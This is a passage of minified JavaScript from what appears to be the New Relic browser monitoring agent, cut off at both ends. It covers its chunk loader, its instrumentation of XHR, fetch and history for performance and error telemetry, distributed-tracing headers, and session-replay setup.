0,n.K7.metrics,R),R.emit("manual-start-all")}catch(e){(0,l.R)(23,e)}},g[p.G4.RECORD]=function(){(0,a.p)(f.xV,["API/recordReplay/called"],void 0,n.K7.metrics,R),(0,a.p)(p.G4.RECORD,[],void 0,n.K7.sessionReplay,R)},g[p.G4.PAUSE]=function(){(0,a.p)(f.xV,["API/pauseReplay/called"],void 0,n.K7.metrics,R),(0,a.p)(p.G4.PAUSE,[],void 0,n.K7.sessionReplay,R)},g.interaction=function(e){return(new O).get("object"==typeof e?e:{})};const _=O.prototype={createTracer:function(e,t){var r={},i=this,o="function"==typeof t;return(0,a.p)(f.xV,["API/createTracer/called"],void 0,n.K7.metrics,R),h||(0,a.p)(S+"tracer",[(0,v.t)(),e,r],i,n.K7.spa,R),function(){if(x.emit((o?"":"no-")+"fn-start",[(0,v.t)(),i,o],r),o)try{return t.apply(this,arguments)}catch(e){const t="string"==typeof e?new Error(e):e;throw x.emit("fn-err",[arguments,this,t],r),t}finally{x.emit("fn-end",[(0,v.t)()],r)}}}};function I(e,t,r,i){return function(){return(0,a.p)(f.xV,["API/"+t+"/called"],void 0,n.K7.metrics,R),i&&(0,a.p)(e+t,[(0,v.t)(),...arguments],r?null:this,i,R),r?void 0:this}}function j(){r.e(478).then(r.bind(r,8778)).then((({setAPI:t})=>{t(e),(0,c.Ze)(e,"api")})).catch((e=>{(0,l.R)(27,e),R.abort()}))}return["actionText","setName","setAttribute","save","ignore","onEnd","getContext","end","get"].forEach((e=>{_[e]=I(S,e,void 0,h?n.K7.softNav:n.K7.spa)})),g.setCurrentRouteName=h?I(S,"routeName",void 0,n.K7.softNav):I(A,"routeName",!0,n.K7.spa),g.noticeError=function(t,r){"string"==typeof t&&(t=new Error(t)),(0,a.p)(f.xV,["API/noticeError/called"],void 0,n.K7.metrics,R),(0,a.p)("err",[t,(0,v.t)(),!1,r,!!E[e]],void 0,n.K7.jserrors,R)},d.RI?(0,u.GG)((()=>j()),!0):j(),g}(e.agentIdentifier,R,e.runSoftNavOverSpa)),void 0===e.exposed&&(e.exposed=k),I=!0}},8374:(e,t,r)=>{r.nc=(()=>{try{return document?.currentScript?.nonce}catch(e){}return""})()},860:(e,t,r)=>{"use strict";r.d(t,{$J:()=>o,K7:()=>n,P3:()=>i});const n={ajax:"ajax",genericEvents:"generic_events",jserrors:"jserrors",logging:"logging",metrics:"metrics",pageAction:"page_action",pageViewEvent:"page_view_event",pageViewTiming:"page_view_timing",sessionReplay:"session_replay",sessionTrace:"session_trace",softNav:"soft_navigations",spa:"spa"},i={[n.pageViewEvent]:1,[n.pageViewTiming]:2,[n.metrics]:3,[n.jserrors]:4,[n.spa]:5,[n.ajax]:6,[n.sessionTrace]:7,[n.softNav]:8,[n.sessionReplay]:9,[n.logging]:10,[n.genericEvents]:11},o={[n.pageViewTiming]:"events",[n.ajax]:"events",[n.spa]:"events",[n.softNav]:"events",[n.metrics]:"jserrors",[n.jserrors]:"jserrors",[n.sessionTrace]:"browser/blobs",[n.sessionReplay]:"browser/blobs",[n.logging]:"browser/logs",[n.genericEvents]:"ins"}}},n={};function i(e){var t=n[e];if(void 0!==t)return t.exports;var o=n[e]={exports:{}};return r[e](o,o.exports,i),o.exports}i.m=r,i.d=(e,t)=>{for(var r in t)i.o(t,r)&&!i.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},i.f={},i.e=e=>Promise.all(Object.keys(i.f).reduce(((t,r)=>(i.f[r](e,t),t)),[])),i.u=e=>({212:"nr-spa-compressor",249:"nr-spa-recorder",478:"nr-spa"}[e]+"-1.274.0.min.js"),i.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),e={},t="NRBA-1.274.0.PROD:",i.l=(r,n,o,a)=>{if(e[r])e[r].push(n);else{var s,c;if(void 0!==o)for(var u=document.getElementsByTagName("script"),d=0;d<u.length;d++){var l=u[d];if(l.getAttribute("src")==r||l.getAttribute("data-webpack")==t+o){s=l;break}}if(!s){c=!0;var f={478:"sha512-1vUqEfJPB8Pihje9mv5CfYgkitO1FWcS+UQb84DbXqP8oYctRv4/lzl/MzNLPlRhcY1WVDBGL20I8vm6s2VV7g==",249:"sha512-Y/BeZAh6VSTmUtUNmS5XdyKxL92s30Fyyj8xVW76HSPxcKItL4+x2+kGMZc8pMJnUpZDz1L4eftZQAJh3D8NnA==",212:"sha512-Gn2tQ3qog5Yhrx/gRutkSTYPp+7nkKFt4/mIXg99LxcNpMDAYJZDBYmAACdoHNM86+iq1F3cBcQotFNzjIX8bw=="};(s=document.createElement("script")).charset="utf-8",s.timeout=120,i.nc&&s.setAttribute("nonce",i.nc),s.setAttribute("data-webpack",t+o),s.src=r,0!==s.src.indexOf(window.location.origin+"/")&&(s.crossOrigin="anonymous"),f[a]&&(s.integrity=f[a])}e[r]=[n];var h=(t,n)=>{s.onerror=s.onload=null,clearTimeout(p);var i=e[r];if(delete e[r],s.parentNode&&s.parentNode.removeChild(s),i&&i.forEach((e=>e(n))),t)return t(n)},p=setTimeout(h.bind(null,void 0,{type:"timeout",target:s}),12e4);s.onerror=h.bind(null,s.onerror),s.onload=h.bind(null,s.onload),c&&document.head.appendChild(s)}},i.r=e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.p="https://js-agent.newrelic.com/",(()=>{var e={38:0,788:0};i.f.j=(t,r)=>{var n=i.o(e,t)?e[t]:void 0;if(0!==n)if(n)r.push(n[2]);else{var o=new Promise(((r,i)=>n=e[t]=[r,i]));r.push(n[2]=o);var a=i.p+i.u(t),s=new Error;i.l(a,(r=>{if(i.o(e,t)&&(0!==(n=e[t])&&(e[t]=void 0),n)){var o=r&&("load"===r.type?"missing":r.type),a=r&&r.target&&r.target.src;s.message="Loading chunk "+t+" failed.\n("+o+": "+a+")",s.name="ChunkLoadError",s.type=o,s.request=a,n[1](s)}}),"chunk-"+t,t)}};var t=(t,r)=>{var n,o,[a,s,c]=r,u=0;if(a.some((t=>0!==e[t]))){for(n in s)i.o(s,n)&&(i.m[n]=s[n]);if(c)c(i)}for(t&&t(r);u<a.length;u++)o=a[u],i.o(e,o)&&e[o]&&e[o][0](),e[o]=0},r=self["webpackChunk:NRBA-1.274.0.PROD"]=self["webpackChunk:NRBA-1.274.0.PROD"]||[];r.forEach(t.bind(null,0)),r.push=t.bind(null,r.push.bind(r))})(),(()=>{"use strict";i(8374);var e=i(944),t=i(6344),r=i(9566);class n{agentIdentifier;constructor(e=(0,r.LA)(16)){this.agentIdentifier=e}#e(t,...r){if("function"==typeof this.api?.[t])return this.api[t](...r);(0,e.R)(35,t)}addPageAction(e,t){return this.#e("addPageAction",e,t)}setPageViewName(e,t){return this.#e("setPageViewName",e,t)}setCustomAttribute(e,t,r){return this.#e("setCustomAttribute",e,t,r)}noticeError(e,t){return this.#e("noticeError",e,t)}setUserId(e){return this.#e("setUserId",e)}setApplicationVersion(e){return this.#e("setApplicationVersion",e)}setErrorHandler(e){return this.#e("setErrorHandler",e)}addRelease(e,t){return this.#e("addRelease",e,t)}log(e,t){return this.#e("log",e,t)}}class o extends n{#e(t,...r){if("function"==typeof this.api?.[t])return this.api[t](...r);(0,e.R)(35,t)}start(){return this.#e("start")}finished(e){return this.#e("finished",e)}recordReplay(){return this.#e(t.G4.RECORD)}pauseReplay(){return this.#e(t.G4.PAUSE)}addToTrace(e){return this.#e("addToTrace",e)}setCurrentRouteName(e){return this.#e("setCurrentRouteName",e)}interaction(){return this.#e("interaction")}wrapLogger(e,t,r){return this.#e("wrapLogger",e,t,r)}}var a=i(860),s=i(9417);const c=Object.values(a.K7);function u(e){const t={};return c.forEach((r=>{t[r]=function(e,t){return!0===(0,s.gD)(t,"".concat(e,".enabled"))}(r,e)})),t}var d=i(425);var l=i(1687),f=i(4234),h=i(5289),p=i(6154),g=i(5270),m=i(7767),v=i(6389);class b extends f.W{constructor(e,t,r=!0){super(e.agentIdentifier,t),this.auto=r,this.abortHandler=void 0,this.featAggregate=void 0,this.onAggregateImported=void 0,!1===e.init[this.featureName].autoStart&&(this.auto=!1),this.auto?(0,l.Ak)(e.agentIdentifier,t):this.ee.on("manual-start-all",(0,v.J)((()=>{(0,l.Ak)(e.agentIdentifier,this.featureName),this.auto=!0,this.importAggregator(e)})))}importAggregator(t,r={}){if(this.featAggregate||!this.auto)return;let n;this.onAggregateImported=new Promise((e=>{n=e}));const o=async()=>{let o;try{if((0,m.V)(this.agentIdentifier)){const{setupAgentSession:e}=await i.e(478).then(i.bind(i,6526));o=e(t)}}catch(t){(0,e.R)(20,t),this.ee.emit("internal-error",[t]),this.featureName===a.K7.sessionReplay&&this.abortHandler?.()}try{if(t.sharedAggregator)await t.sharedAggregator;else{t.sharedAggregator=i.e(478).then(i.bind(i,9337));const{EventAggregator:e}=await t.sharedAggregator;t.sharedAggregator=new e}if(!this.#t(this.featureName,o))return(0,l.Ze)(this.agentIdentifier,this.featureName),void n(!1);const{lazyFeatureLoader:e}=await i.e(478).then(i.bind(i,6103)),{Aggregate:a}=await e(this.featureName,"aggregate");this.featAggregate=new a(t,r),n(!0)}catch(t){(0,e.R)(34,t),this.abortHandler?.(),(0,l.Ze)(this.agentIdentifier,this.featureName,!0),n(!1),this.ee&&this.ee.abort()}};p.RI?(0,h.GG)((()=>o()),!0):o()}#t(e,t){switch(e){case a.K7.sessionReplay:return(0,g.SR)(this.agentIdentifier)&&!!t;case a.K7.sessionTrace:return!!t;default:return!0}}}var y=i(6630);class w extends b{static featureName=y.T;constructor(e,t=!0){super(e,y.T,t),this.importAggregator(e)}}var R=i(384);var x=i(9908),T=i(2843),A=i(3878),E=i(782),S=i(1863);class N extends b{static featureName=E.T;constructor(e,t=!0){super(e,E.T,t),p.RI&&((0,T.u)((()=>(0,x.p)("docHidden",[(0,S.t)()],void 0,E.T,this.ee)),!0),(0,A.sp)("pagehide",(()=>(0,x.p)("winPagehide",[(0,S.t)()],void 0,E.T,this.ee))),this.importAggregator(e))}}var O=i(3969);class _ extends b{static featureName=O.TZ;constructor(e,t=!0){super(e,O.TZ,t),this.importAggregator(e)}}var I=i(6774),j=i(3304);class P{constructor(e,t,r,n,i){this.name="UncaughtError",this.message="string"==typeof e?e:(0,j.A)(e),this.sourceURL=t,this.line=r,this.column=n,this.__newrelic=i}}function C(e){return H(e)?e:new P(void 0!==e?.message?e.message:e,e?.filename||e?.sourceURL,e?.lineno||e?.line,e?.colno||e?.col,e?.__newrelic)}function k(e){const t="Unhandled Promise Rejection";if(!e?.reason)return;if(H(e.reason))try{return e.reason.message=t+": "+e.reason.message,C(e.reason)}catch(t){return C(e.reason)}const r=C(e.reason);return r.message=t+": "+r?.message,r}function L(e){if(e.error instanceof SyntaxError&&!/:\d+$/.test(e.error.stack?.trim())){const t=new P(e.message,e.filename,e.lineno,e.colno,e.error.__newrelic);return t.name=SyntaxError.name,t}return H(e.error)?e.error:C(e)}function H(e){return e instanceof Error&&!!e.stack}class D extends b{static featureName=I.T;#r=!1;constructor(e,r=!0){super(e,I.T,r);try{this.removeOnAbort=new AbortController}catch(e){}this.ee.on("internal-error",(e=>{this.abortHandler&&(0,x.p)("ierr",[C(e),(0,S.t)(),!0,{},this.#r],void 0,this.featureName,this.ee)})),this.ee.on(t.G4.REPLAY_RUNNING,(e=>{this.#r=e})),p.gm.addEventListener("unhandledrejection",(e=>{this.abortHandler&&(0,x.p)("err",[k(e),(0,S.t)(),!1,{unhandledPromiseRejection:1},this.#r],void 0,this.featureName,this.ee)}),(0,A.jT)(!1,this.removeOnAbort?.signal)),p.gm.addEventListener("error",(e=>{this.abortHandler&&(0,x.p)("err",[L(e),(0,S.t)(),!1,{},this.#r],void 0,this.featureName,this.ee)}),(0,A.jT)(!1,this.removeOnAbort?.signal)),this.abortHandler=this.#n,this.importAggregator(e)}#n(){this.removeOnAbort?.abort(),this.abortHandler=void 0}}var M=i(8990);let K=1;const U="nr@id";function V(e){const t=typeof e;return!e||"object"!==t&&"function"!==t?-1:e===p.gm?0:(0,M.I)(e,U,(function(){return K++}))}function G(e){if("string"==typeof e&&e.length)return e.length;if("object"==typeof e){if("undefined"!=typeof ArrayBuffer&&e instanceof ArrayBuffer&&e.byteLength)return e.byteLength;if("undefined"!=typeof Blob&&e instanceof Blob&&e.size)return e.size;if(!("undefined"!=typeof FormData&&e instanceof FormData))try{return(0,j.A)(e).length}catch(e){return}}}var F=i(8139),B=i(7836),W=i(3434);const z={},q=["open","send"];function Z(t){var r=t||B.ee;const n=function(e){return(e||B.ee).get("xhr")}(r);if(z[n.debugId]++)return n;z[n.debugId]=1,(0,F.u)(r);var i=(0,W.YM)(n),o=p.gm.XMLHttpRequest,a=p.gm.MutationObserver,s=p.gm.Promise,c=p.gm.setInterval,u="readystatechange",d=["onload","onerror","onabort","onloadstart","onloadend","onprogress","ontimeout"],l=[],f=p.gm.XMLHttpRequest=function(t){const r=new o(t),a=n.context(r);try{n.emit("new-xhr",[r],a),r.addEventListener(u,(s=a,function(){var e=this;e.readyState>3&&!s.resolved&&(s.resolved=!0,n.emit("xhr-resolved",[],e)),i.inPlace(e,d,"fn-",y)}),(0,A.jT)(!1))}catch(t){(0,e.R)(15,t);try{n.emit("internal-error",[t])}catch(e){}}var s;return r};function h(e,t){i.inPlace(t,["onreadystatechange"],"fn-",y)}if(function(e,t){for(var r in e)t[r]=e[r]}(o,f),f.prototype=o.prototype,i.inPlace(f.prototype,q,"-xhr-",y),n.on("send-xhr-start",(function(e,t){h(e,t),function(e){l.push(e),a&&(g?g.then(b):c?c(b):(m=-m,v.data=m))}(t)})),n.on("open-xhr-start",h),a){var g=s&&s.resolve();if(!c&&!s){var m=1,v=document.createTextNode(m);new a(b).observe(v,{characterData:!0})}}else r.on("fn-end",(function(e){e[0]&&e[0].type===u||b()}));function b(){for(var e=0;e<l.length;e++)h(0,l[e]);l.length&&(l=[])}function y(e,t){return t}return n}var Y="fetch-",X=Y+"body-",J=["arrayBuffer","blob","json","text","formData"],Q=p.gm.Request,ee=p.gm.Response,te="prototype";const re={};function ne(e){const t=function(e){return(e||B.ee).get("fetch")}(e);if(!(Q&&ee&&p.gm.fetch))return t;if(re[t.debugId]++)return t;function r(e,r,n){var i=e[r];"function"==typeof i&&(e[r]=function(){var e,r=[...arguments],o={};t.emit(n+"before-start",[r],o),o[B.P]&&o[B.P].dt&&(e=o[B.P].dt);var a=i.apply(this,r);return t.emit(n+"start",[r,e],a),a.then((function(e){return t.emit(n+"end",[null,e],a),e}),(function(e){throw t.emit(n+"end",[e],a),e}))})}return re[t.debugId]=1,J.forEach((e=>{r(Q[te],e,X),r(ee[te],e,X)})),r(p.gm,"fetch",Y),t.on(Y+"end",(function(e,r){var n=this;if(r){var i=r.headers.get("content-length");null!==i&&(n.rxSize=i),t.emit(Y+"done",[null,r],n)}else t.emit(Y+"done",[e],n)})),t}var ie=i(7485),oe=i(5603);class ae{constructor(e){this.agentIdentifier=e}generateTracePayload(e){if(!this.shouldGenerateTrace(e))return null;var t=(0,oe.o)(this.agentIdentifier);if(!t)return null;var n=(t.accountID||"").toString()||null,i=(t.agentID||"").toString()||null,o=(t.trustKey||"").toString()||null;if(!n||!i)return null;var a=(0,r.ZF)(),s=(0,r.el)(),c=Date.now(),u={spanId:a,traceId:s,timestamp:c};return(e.sameOrigin||this.isAllowedOrigin(e)&&this.useTraceContextHeadersForCors())&&(u.traceContextParentHeader=this.generateTraceContextParentHeader(a,s),u.traceContextStateHeader=this.generateTraceContextStateHeader(a,c,n,i,o)),(e.sameOrigin&&!this.excludeNewrelicHeader()||!e.sameOrigin&&this.isAllowedOrigin(e)&&this.useNewrelicHeaderForCors())&&(u.newrelicHeader=this.generateTraceHeader(a,s,c,n,i,o)),u}generateTraceContextParentHeader(e,t){return"00-"+t+"-"+e+"-01"}generateTraceContextStateHeader(e,t,r,n,i){return i+"@nr=0-1-"+r+"-"+n+"-"+e+"----"+t}generateTraceHeader(e,t,r,n,i,o){if(!("function"==typeof p.gm?.btoa))return null;var a={v:[0,1],d:{ty:"Browser",ac:n,ap:i,id:e,tr:t,ti:r}};return o&&n!==o&&(a.d.tk=o),btoa((0,j.A)(a))}shouldGenerateTrace(e){return this.isDtEnabled()&&this.isAllowedOrigin(e)}isAllowedOrigin(e){var t=!1,r={};if((0,s.gD)(this.agentIdentifier,"distributed_tracing")&&(r=(0,s.D0)(this.agentIdentifier).distributed_tracing),e.sameOrigin)t=!0;else if(r.allowed_origins instanceof Array)for(var n=0;n<r.allowed_origins.length;n++){var i=(0,ie.D)(r.allowed_origins[n]);if(e.hostname===i.hostname&&e.protocol===i.protocol&&e.port===i.port){t=!0;break}}return t}isDtEnabled(){var e=(0,s.gD)(this.agentIdentifier,"distributed_tracing");return!!e&&!!e.enabled}excludeNewrelicHeader(){var e=(0,s.gD)(this.agentIdentifier,"distributed_tracing");return!!e&&!!e.exclude_newrelic_header}useNewrelicHeaderForCors(){var e=(0,s.gD)(this.agentIdentifier,"distributed_tracing");return!!e&&!1!==e.cors_use_newrelic_header}useTraceContextHeadersForCors(){var e=(0,s.gD)(this.agentIdentifier,"distributed_tracing");return!!e&&!!e.cors_use_tracecontext_headers}}var se=i(9300),ce=i(7295),ue=["load","error","abort","timeout"],de=ue.length,le=(0,R.dV)().o.REQ,fe=(0,R.dV)().o.XHR;class he extends b{static featureName=se.T;constructor(e,t=!0){super(e,se.T,t),this.dt=new ae(e.agentIdentifier),this.handler=(e,t,r,n)=>(0,x.p)(e,t,r,n,this.ee);try{const e={xmlhttprequest:"xhr",fetch:"fetch",beacon:"beacon"};p.gm?.performance?.getEntriesByType("resource").forEach((t=>{if(t.initiatorType in e&&0!==t.responseStatus){const r={status:t.responseStatus},n={rxSize:t.transferSize,duration:Math.floor(t.duration),cbTime:0};pe(r,t.name),this.handler("xhr",[r,n,t.startTime,t.responseEnd,e[t.initiatorType]],void 0,a.K7.ajax)}}))}catch(e){}ne(this.ee),Z(this.ee),function(e,t,r,n){function i(e){var t=this;t.totalCbs=0,t.called=0,t.cbTime=0,t.end=R,t.ended=!1,t.xhrGuids={},t.lastSize=null,t.loadCaptureCalled=!1,t.params=this.params||{},t.metrics=this.metrics||{},e.addEventListener("load",(function(r){T(t,e)}),(0,A.jT)(!1)),p.lR||e.addEventListener("progress",(function(e){t.lastSize=e.loaded}),(0,A.jT)(!1))}function o(e){this.params={method:e[0]},pe(this,e[1]),this.metrics={}}function s(t,r){e.loader_config.xpid&&this.sameOrigin&&r.setRequestHeader("X-NewRelic-ID",e.loader_config.xpid);var i=n.generateTracePayload(this.parsedOrigin);if(i){var o=!1;i.newrelicHeader&&(r.setRequestHeader("newrelic",i.newrelicHeader),o=!0),i.traceContextParentHeader&&(r.setRequestHeader("traceparent",i.traceContextParentHeader),i.traceContextStateHeader&&r.setRequestHeader("tracestate",i.traceContextStateHeader),o=!0),o&&(this.dt=i)}}function c(e,r){var n=this.metrics,i=e[0],o=this;if(n&&i){var a=G(i);a&&(n.txSize=a)}this.startTime=(0,S.t)(),this.body=i,this.listener=function(e){try{"abort"!==e.type||o.loadCaptureCalled||(o.params.aborted=!0),("load"!==e.type||o.called===o.totalCbs&&(o.onloadCalled||"function"!=typeof r.onload)&&"function"==typeof o.end)&&o.end(r)}catch(e){try{t.emit("internal-error",[e])}catch(e){}}};for(var s=0;s<de;s++)r.addEventListener(ue[s],this.listener,(0,A.jT)(!1))}function u(e,t,r){this.cbTime+=e,t?this.onloadCalled=!0:this.called+=1,this.called!==this.totalCbs||!this.onloadCalled&&"function"==typeof r.onload||"function"!=typeof this.end||this.end(r)}function d(e,t){var r=""+V(e)+!!t;this.xhrGuids&&!this.xhrGuids[r]&&(this.xhrGuids[r]=!0,this.totalCbs+=1)}function l(e,t){var r=""+V(e)+!!t;this.xhrGuids&&this.xhrGuids[r]&&(delete this.xhrGuids[r],this.totalCbs-=1)}function f(){this.endTime=(0,S.t)()}function h(e,r){r instanceof fe&&"load"===e[0]&&t.emit("xhr-load-added",[e[1],e[2]],r)}function g(e,r){r instanceof fe&&"load"===e[0]&&t.emit("xhr-load-removed",[e[1],e[2]],r)}function m(e,t,r){t instanceof fe&&("onload"===r&&(this.onload=!0),("load"===(e[0]&&e[0].type)||this.onload)&&(this.xhrCbStart=(0,S.t)()))}function v(e,r){this.xhrCbStart&&t.emit("xhr-cb-time",[(0,S.t)()-this.xhrCbStart,this.onload,r],r)}function b(e){var t,r=e[1]||{};if("string"==typeof e[0]?0===(t=e[0]).length&&p.RI&&(t=""+p.gm.location.href):e[0]&&e[0].url?t=e[0].url:p.gm?.URL&&e[0]&&e[0]instanceof URL?t=e[0].href:"function"==typeof e[0].toString&&(t=e[0].toString()),"string"==typeof t&&0!==t.length){t&&(this.parsedOrigin=(0,ie.D)(t),this.sameOrigin=this.parsedOrigin.sameOrigin);var i=n.generateTracePayload(this.parsedOrigin);if(i&&(i.newrelicHeader||i.traceContextParentHeader))if(e[0]&&e[0].headers)s(e[0].headers,i)&&(this.dt=i);else{var o={};for(var a in r)o[a]=r[a];o.headers=new Headers(r.headers||{}),s(o.headers,i)&&(this.dt=i),e.length>1?e[1]=o:e.push(o)}}function s(e,t){var r=!1;return t.newrelicHeader&&(e.set("newrelic",t.newrelicHeader),r=!0),t.traceContextParentHeader&&(e.set("traceparent",t.traceContextParentHeader),t.traceContextStateHeader&&e.set("tracestate",t.traceContextStateHeader),r=!0),r}}function y(e,t){this.params={},this.metrics={},this.startTime=(0,S.t)(),this.dt=t,e.length>=1&&(this.target=e[0]),e.length>=2&&(this.opts=e[1]);var r,n=this.opts||{},i=this.target;"string"==typeof i?r=i:"object"==typeof i&&i instanceof le?r=i.url:p.gm?.URL&&"object"==typeof i&&i instanceof URL&&(r=i.href),pe(this,r);var o=(""+(i&&i instanceof le&&i.method||n.method||"GET")).toUpperCase();this.params.method=o,this.body=n.body,this.txSize=G(n.body)||0}function w(e,t){if(this.endTime=(0,S.t)(),this.params||(this.params={}),(0,ce.iW)(this.params))return;let n;this.params.status=t?t.status:0,"string"==typeof this.rxSize&&this.rxSize.length>0&&(n=+this.rxSize);const i={txSize:this.txSize,rxSize:n,duration:(0,S.t)()-this.startTime};r("xhr",[this.params,i,this.startTime,this.endTime,"fetch"],this,a.K7.ajax)}function R(e){const t=this.params,n=this.metrics;if(!this.ended){this.ended=!0;for(let t=0;t<de;t++)e.removeEventListener(ue[t],this.listener,!1);t.aborted||(0,ce.iW)(t)||(n.duration=(0,S.t)()-this.startTime,this.loadCazptureCalled||4!==e.readyState?null==t.status&&(t.status=0):T(this,e),n.cbTime=this.cbTime,r("xhr",[t,n,this.startTime,this.endTime,"xhr"],this,a.K7.ajax))}}function T(e,r){e.params.status=r.status;var n=function(e,t){var r=e.responseType;return"json"===r&&null!==t?t:"arraybuffer"===r||"blob"===r||"json"===r?G(e.response):"text"===r||""===r||void 0===r?G(e.responseText):void 0}(r,e.lastSize);if(n&&(e.metrics.rxSize=n),e.sameOrigin){var i=r.getResponseHeader("X-NewRelic-App-Data");i&&((0,x.p)(O.rs,["Ajax/CrossApplicationTracing/Header/Seen"],void 0,a.K7.metrics,t),e.params.cat=i.split(", ").pop())}e.loadCaptureCalled=!0}t.on("new-xhr",i),t.on("open-xhr-start",o),t.on("open-xhr-end",s),t.on("send-xhr-start",c),t.on("xhr-cb-time",u),t.on("xhr-load-added",d),t.on("xhr-load-removed",l),t.on("xhr-resolved",f),t.on("addEventListener-end",h),t.on("removeEventListener-end",g),t.on("fn-end",v),t.on("fetch-before-start",b),t.on("fetch-start",y),t.on("fn-start",m),t.on("fetch-done",w)}(e,this.ee,this.handler,this.dt),this.importAggregator(e)}}function pe(e,t){var r=(0,ie.D)(t),n=e.params||e;n.hostname=r.hostname,n.port=r.port,n.protocol=r.protocol,n.host=r.hostname+":"+r.port,n.pathname=r.pathname,e.parsedOrigin=r,e.sameOrigin=r.sameOrigin}const ge={},me=["pushState","replaceState"];function ve(e){const t=function(e){return(e||B.ee).get("history")}(e);return!p.RI||ge[t.debugId]++||(ge[t.debugId]=1,(0,W.YM)(t).inPlace(window.history,me,"-")),t}var be=i(3738);const{He:ye,bD:we,d3:Re,Kp:xe,TZ:Te,Lc:Ae,uP:Ee,Rz:Se}=be;class Ne extends b{static featureName=Te;constructor(e,t=!0){super(e,Te,t);if(!(0,m.V)(this.agentIdentifier))return void this.deregisterDrain();const r=this.ee;let n;ve(r),this.eventsEE=(0,F.u)(r),this.eventsEE.on(Ee,(function(e,t){this.bstStart=(0,S.t)()})),this.eventsEE.on(Ae,(function(e,t){(0,x.p)("bst",[e[0],t,this.bstStart,(0,S.t)()],void 0,a.K7.sessionTrace,r)})),r.on(Se+Re,(function(e){this.time=(0,S.t)(),this.startPath=location.pathname+location.hash})),r.on(Se+xe,(function(e){(0,x.p)("bstHist",[location.pathname+location.hash,this.startPath,this.time],void 0,a.K7.sessionTrace,r)}));try{n=new PerformanceObserver((e=>{const t=e.getEntries();(0,x.p)(ye,[t],void 0,a.K7.sessionTrace,r)})),n.observe({type:we,buffered:!0})}catch(e){}this.importAggregator(e,{resourceObserver:n})}}var Oe=i(2614);class _e extends b{static featureName=t.TZ;#i;#o;constructor(e,r=!0){let n;super(e,t.TZ,r),this.replayRunning=!1,this.#o=e;try{n=JSON.parse(localStorage.getItem("".concat(Oe.H3,"_").concat(Oe.uh)))}catch(e){}(0,g.SR)(e.agentIdentifier)&&this.ee.on(t.G4.RECORD,(()=>this.#a())),this.#s(n)?(this.#i=n?.sessionReplayMode,this.#c()):this.importAggregator(e),this.ee.on("err",(e=>{this.replayRunning&&(this.errorNoticed=!0,(0,x.p)(t.G4.ERROR_DURING_REPLAY,[e],void 0,this.featureName,this.ee))})),this.ee.on(t.G4.REPLAY_RUNNING,(e=>{this.replayRunning=e}))}#s(e){return e&&(e.sessionReplayMode===Oe.g.FULL||e.sessionReplayMode===Oe.g.ERROR)||(0,g.Aw)(this.agentIdentifier)}#u=!1;async#c(e){if(!this.#u){this.#u=!0;try{const{Recorder:t}=await Promise.all([i.e(478),i.e(249)]).then(i.bind(i,8589));this.recorder??=new t({mode:this.#i,agentIdentifier:this.agentIdentifier,trigger:e,ee:this.ee}),this.recorder.startRecording(),this.abortHandler=this.recorder.stopRecording}catch(e){}this.importAggregator(this.#o,{recorder:this.recorder,errorNoticed:this.errorNoticed})}}#a(){this.featAggregate?this.featAggregate.mode!==Oe.g.FULL&&this.featAggregate.initializeRecording(Oe.g.FULL,!0):(this.#i=Oe.g.FULL,this.#c(t.Qb.API),this.recorder&&this.recorder.parent.mode!==Oe.g.FULL&&(this.recorder.parent.mode=Oe.g.FULL,this.recorder.stopRecording(),this.recorder.startRecording(),this.abortHandler=this.recorder.stopRecording))}}var Ie=i(3962);class je extends b{static featureName=Ie.TZ;constructor(e,t=!0){if(super(e,Ie.TZ,t),!p.RI||!(0,R.dV)().o.MO)return;const r=ve(this.ee);Ie.tC.forEach((e=>{(0,A.sp)(e,(e=>{a(e)}),!0)}));const n=()=>(0,x.p)("newURL",[(0,S.t)(),""+window.location],void 0,this.featureName,this.ee);r.on("pushState-end",n),r.on("replaceState-end",n);try{this.removeOnAbort=new AbortController}catch(e){}(0,A.sp)("popstate",(e=>(0,x.p)("newURL",[e.timeStamp,""+window.location],void 0,this.featureName,this.ee)),!0,this.removeOnAbort?.signal);let i=!1;const o=new((0,R.dV)().o.MO)(((e,t)=>{i||(i=!0,requestAnimationFrame((()=>{(0,x.p)("newDom",[(0,S.t)()],void 0,this.featureName,this.ee),i=!1})))})),a=(0,v.s)((e=>{(0,x.p)("newUIEvent",[e],void 0,this.featureName,this.ee),o.observe(document.body,{attributes:!0,childList:!0,subtree:!0,characterData:!0})}),100,{leading:!0});this.abortHandler=function(){this.removeOnAbort?.abort(),o.disconnect(),this.abortHandler=void 0},this.importAggregator(e,{domObserver:o})}}var Pe=i(7378);const Ce={},ke=["appendChild","insertBefore","replaceChild"];function Le(e){const t=function(e){return(e||B.ee).get("jsonp")}(e);if(!p.RI||Ce[t.debugId])return t;Ce[t.debugId]=!0;var r=(0,W.YM)(t),n=/[?&](?:callback|cb)=([^&#]+)/,i=/(.*)\.([^.]+)/,o=/^(\w+)(\.|$)(.*)$/;function a(e,t){if(!e)return t;const r=e.match(o),n=r[1];return a(r[3],t[n])}return r.inPlace(Node.prototype,ke,"dom-"),t.on("dom-start",(function(e){!function(e){if(!e||"string"!=typeof e.nodeName||"script"!==e.nodeName.toLowerCase())return;if("function"!=typeof e.addEventListener)return;var o=(s=e.src,c=s.match(n),c?c[1]:null);var s,c;if(!o)return;var u=function(e){var t=e.match(i);if(t&&t.length>=3)return{key:t[2],parent:a(t[1],window)};return{key:e,parent:window}}(o);if("function"!=typeof u.parent[u.key])return;var d={};function l(){t.emit("jsonp-end",[],d),e.removeEventListener("load",l,(0,A.jT)(!1)),e.removeEventListener("error",f,(0,A.jT)(!1))}function f(){t.emit("jsonp-error",[],d),t.emit("jsonp-end",[],d),e.removeEventListener("load",l,(0,A.jT)(!1)),e.removeEventListener("error",f,(0,A.jT)(!1))}r.inPlace(u.parent,[u.key],"cb-",d),e.addEventListener("load",l,(0,A.jT)(!1)),e.addEventListener("error",f,(0,A.jT)(!1)),t.emit("new-jsonp",[e.src],d)}(e[0])})),t}const He={};function De(e){const t=function(e){return(e||B.ee).get("promise")}(e);if(He[t.debugId])return t;He[t.debugId]=!0;var r=t.context,n=(0,W.YM)(t),i=p.gm.Promise;return i&&function(){function e(r){var o=t.context(),a=n(r,"executor-",o,null,!1);const s=Reflect.construct(i,[a],e);return t.context(s).getCtx=function(){return 